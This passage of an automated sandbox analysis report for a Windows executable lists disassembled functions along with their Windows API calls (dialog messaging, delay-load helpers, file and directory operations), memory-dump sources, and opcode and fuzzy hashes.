                                                                • Part of subcall function 0043B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0043B579
                                                                • Part of subcall function 0043B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0043B58A
                                                                • Part of subcall function 0043B568: IsDialogMessageW.USER32(00010484,?), ref: 0043B59E
                                                                • Part of subcall function 0043B568: TranslateMessage.USER32(?), ref: 0043B5AC
                                                                • Part of subcall function 0043B568: DispatchMessageW.USER32(?), ref: 0043B5B6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                              • String ID:
                                                              • API String ID: 897784432-0
                                                              • Opcode ID: f458bd3b154df5e1d1737438395f8b69eaea5e4a8769f4c7a095b97b3657a9a3
                                                              • Instruction ID: 5bfe5204c058cd44920c41a1852639c8f0e1f0acfda919c6d020e88bc0b863cf
                                                              • Opcode Fuzzy Hash: f458bd3b154df5e1d1737438395f8b69eaea5e4a8769f4c7a095b97b3657a9a3
                                                              • Instruction Fuzzy Hash: DBD09E31144300BAE6012B52CD06F0F7AA2AB8CF09F005A59B384740B19AB29D21DB1A
                                                              Function 0043E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • DloadProtectSection.DELAYIMP ref: 0043E5E3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: DloadProtectSection
                                                              • String ID:
                                                              • API String ID: 2203082970-0
                                                              • Opcode ID: 26e9a40dd33ba9ba38c5a05b4a58a1d7c6bf1733143db2135efb6929519dc563
                                                              • Instruction ID: 0b82b3784ec37d255d4c61c9797ee7ca684babba7b4268ffbece75af92859c9d
                                                              • Opcode Fuzzy Hash: 26e9a40dd33ba9ba38c5a05b4a58a1d7c6bf1733143db2135efb6929519dc563
                                                              • Instruction Fuzzy Hash: EAD0C774981240DBD605FB97D88675D3258736C705FD0251BB145915E1D76C4442870D
                                                              Function 004298BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileType.KERNELBASE(000000FF,004297BE), ref: 004298C8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: FileType
                                                              • String ID:
                                                              • API String ID: 3081899298-0
                                                              • Opcode ID: 083848f6f031339c902f5cc1e3e326ae74406dc79a05a985a07532d99ff7149d
                                                              • Instruction ID: a035ef41409eb5598175e2dea43559d572e0d3b15255e5053c0e049637b7543e
                                                              • Opcode Fuzzy Hash: 083848f6f031339c902f5cc1e3e326ae74406dc79a05a985a07532d99ff7149d
                                                              • Instruction Fuzzy Hash: F0C01234510215858E246A34A8440967311AE537B6BFC8695C028C51E1C326CC4BEA15
                                                              Function 0043E44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E3FC
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: eac063e7c812e195c601dadc967b6c4b240e0f98cbbf0fb2919edf522a5f0f9c
                                                              • Instruction ID: 5a88ea1abd0556fda34ce9b13e960947c61632b4d5fd53251a3cd28654403e34
                                                              • Opcode Fuzzy Hash: eac063e7c812e195c601dadc967b6c4b240e0f98cbbf0fb2919edf522a5f0f9c
                                                              • Instruction Fuzzy Hash: B0B092A125A100AC2108A1061802D3A0248C18AB16730E42FBC04E20C1D848490A093B
                                                              Function 0043E419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E3FC
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 58dd3a3812c94402a28b7092546c927ffe2526ec2b97d95a3aae8a074097f462
                                                              • Instruction ID: 67186025804ca6d4dc2de39e1a447055449b3efc9691279abaf0b35ed51a17ec
                                                              • Opcode Fuzzy Hash: 58dd3a3812c94402a28b7092546c927ffe2526ec2b97d95a3aae8a074097f462
                                                              • Instruction Fuzzy Hash: EDB092A125A100AC210861061902D3A0248C18AB16730E42FB904E60C19848090A093B
                                                              Function 0043E423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E3FC
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: b7bb618d522bbbfc15b0f316e953129870d4bd922b33c3027332f40a6253f2ba
                                                              • Instruction ID: 3acfbb1ce933dfd6b0086581fcf8a5eaee4be8899558c6d306f419ee11b840ba
                                                              • Opcode Fuzzy Hash: b7bb618d522bbbfc15b0f316e953129870d4bd922b33c3027332f40a6253f2ba
                                                              • Instruction Fuzzy Hash: F2B092A125A100BC2108A1061802D3A0248C189F1A730A42FBC04D20C2D84C4A06093B
                                                              Function 0043E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E3FC
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 18c36318d6031283afeef8c7df4581086d8ef103a371007bf076b80d024f91cd
                                                              • Instruction ID: 21f9b80571ad19aa15faa444a21c036cb4265ae3b106880c9f16dfb12a8a55df
                                                              • Opcode Fuzzy Hash: 18c36318d6031283afeef8c7df4581086d8ef103a371007bf076b80d024f91cd
                                                              • Instruction Fuzzy Hash: EEA001E66AA252BD310862536D56D3B025DC5C9B2AB30A52FFC25A64C2AC88194A187B
                                                              Function 0043E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E3FC
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 9f47002ecf1c430c51656366b1298eeb7818c81044895317ea6fbd562a849c3c
                                                              • Instruction ID: e04fe1a52a8dc8bc598efa95b6afa9ce53e8df57675b5b7bf563568b8dac1f24
                                                              • Opcode Fuzzy Hash: 9f47002ecf1c430c51656366b1298eeb7818c81044895317ea6fbd562a849c3c
                                                              • Instruction Fuzzy Hash: 33A002E555E151BC310861535D56D37025DC5C9B55730651FFC15954C158481946187B
                                                              Function 0043E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E3FC
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 4efa503b40189eacee973350bb5f6e77a6574fc1ea6bdf6578b7bf13f9e4a4eb
                                                              • Instruction ID: e04fe1a52a8dc8bc598efa95b6afa9ce53e8df57675b5b7bf563568b8dac1f24
                                                              • Opcode Fuzzy Hash: 4efa503b40189eacee973350bb5f6e77a6574fc1ea6bdf6578b7bf13f9e4a4eb
                                                              • Instruction Fuzzy Hash: 33A002E555E151BC310861535D56D37025DC5C9B55730651FFC15954C158481946187B
                                                              Function 0043E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E3FC
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 4bc42370e3dc8b1b4421ba2dd859e3b234b17607e64453dce37e9616b3a37b85
                                                              • Instruction ID: e04fe1a52a8dc8bc598efa95b6afa9ce53e8df57675b5b7bf563568b8dac1f24
                                                              • Opcode Fuzzy Hash: 4bc42370e3dc8b1b4421ba2dd859e3b234b17607e64453dce37e9616b3a37b85
                                                              • Instruction Fuzzy Hash: 33A002E555E151BC310861535D56D37025DC5C9B55730651FFC15954C158481946187B
                                                              Function 0043E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E3FC
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 53cdf931889147b3b35c70d5158e082fa3f04a90f11d548c2bc09b1c315f63df
                                                              • Instruction ID: e04fe1a52a8dc8bc598efa95b6afa9ce53e8df57675b5b7bf563568b8dac1f24
                                                              • Opcode Fuzzy Hash: 53cdf931889147b3b35c70d5158e082fa3f04a90f11d548c2bc09b1c315f63df
                                                              • Instruction Fuzzy Hash: 33A002E555E151BC310861535D56D37025DC5C9B55730651FFC15954C158481946187B
                                                              Function 0043E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E3FC
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: be8d2a322341236d4de7157a46a584140ece6f3558ba5e12e595eac0795fff42
                                                              • Instruction ID: e04fe1a52a8dc8bc598efa95b6afa9ce53e8df57675b5b7bf563568b8dac1f24
                                                              • Opcode Fuzzy Hash: be8d2a322341236d4de7157a46a584140ece6f3558ba5e12e595eac0795fff42
                                                              • Instruction Fuzzy Hash: 33A002E555E151BC310861535D56D37025DC5C9B55730651FFC15954C158481946187B
                                                              Function 00429F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetEndOfFile.KERNELBASE(?,0042903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00429F0C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: File
                                                              • String ID:
                                                              • API String ID: 749574446-0
                                                              • Opcode ID: 43baba364e5cf6eb77f1a0bae5e594cdcf225e9185015fbc91bc1b35ec03f088
                                                              • Instruction ID: d1c3197d52a2b9d76e44631a5660fd6d1f6504444cff8f29b6cad86d1bf2d139
                                                              • Opcode Fuzzy Hash: 43baba364e5cf6eb77f1a0bae5e594cdcf225e9185015fbc91bc1b35ec03f088
                                                              • Instruction Fuzzy Hash: 70A0113008020A8A8E002B30CA0800E3B20EB22BC230002A8A00ACA0A2CB22880B8A00
                                                              Function 0043AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetCurrentDirectoryW.KERNELBASE(?,0043AE72,C:\Users\user\Desktop,00000000,0046946A,00000006), ref: 0043AC08
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory
                                                              • String ID:
                                                              • API String ID: 1611563598-0
                                                              • Opcode ID: e0ff7ecbfbe52ad18c931015f6692ccf71c23d41cf15b390a180ec3c16d4dc69
                                                              • Instruction ID: e113185100ebd27bdac2c7cfc2aa6e9e708510479f5afa86aa7eb9f638dd578d
                                                              • Opcode Fuzzy Hash: e0ff7ecbfbe52ad18c931015f6692ccf71c23d41cf15b390a180ec3c16d4dc69
                                                              • Instruction Fuzzy Hash: F5A011302002008B82000F328F0AA0EBAAAAFA2B82F00C038A08080030CB30C820AA08
                                                              Function 00429620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CloseHandle.KERNELBASE(000000FF,?,?,004295D6,?,?,?,?,?,00452641,000000FF), ref: 0042963B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: 59b26c4e63d8c1c877641f96e848808e283806c04fe82d4de79bbe0be2bf262c
                                                              • Instruction ID: e4b950ae509c64253ed3826844f2767a69cb80a1405f2745e8ab74610c5d6c2b
                                                              • Opcode Fuzzy Hash: 59b26c4e63d8c1c877641f96e848808e283806c04fe82d4de79bbe0be2bf262c
                                                              • Instruction Fuzzy Hash: 21F0E930181B259FDB308A20D44879377E86B12321F441B1FD0E242AE0D3696D8D9A44

                                                              Non-executed Functions

                                                              Function 0043C220 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 286timewindowfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00421316: GetDlgItem.USER32(00000000,00003021), ref: 0042135A
                                                                • Part of subcall function 00421316: SetWindowTextW.USER32(00000000,004535F4), ref: 00421370
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0043C2B1
                                                              • EndDialog.USER32(?,00000006), ref: 0043C2C4
                                                              • GetDlgItem.USER32(?,0000006C), ref: 0043C2E0
                                                              • SetFocus.USER32(00000000), ref: 0043C2E7
                                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 0043C321
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0043C358
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0043C36E
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0043C38C
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0043C39C
